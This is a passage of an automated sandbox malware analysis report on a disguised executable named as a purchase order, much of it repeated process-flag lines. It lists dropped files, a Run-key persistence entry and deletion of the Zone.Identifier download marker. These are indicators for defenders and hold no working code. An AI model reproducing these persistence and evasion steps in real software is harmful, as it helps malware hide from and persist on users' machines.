                      Source: Binary string: @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: ww08042021New-PurchaseOrder.PDB source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32 source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdbD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Windows.Forms.pdb04lk source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0040289F
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret 5_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret 5_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040B50D push ecx; ret 5_2_0040B51D
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret 6_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret 6_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_0040B50D push ecx; ret 6_2_0040B51D
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeFile created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeFile created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_00401306
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SWqTT
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SWqTT

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile opened: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00408E31
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
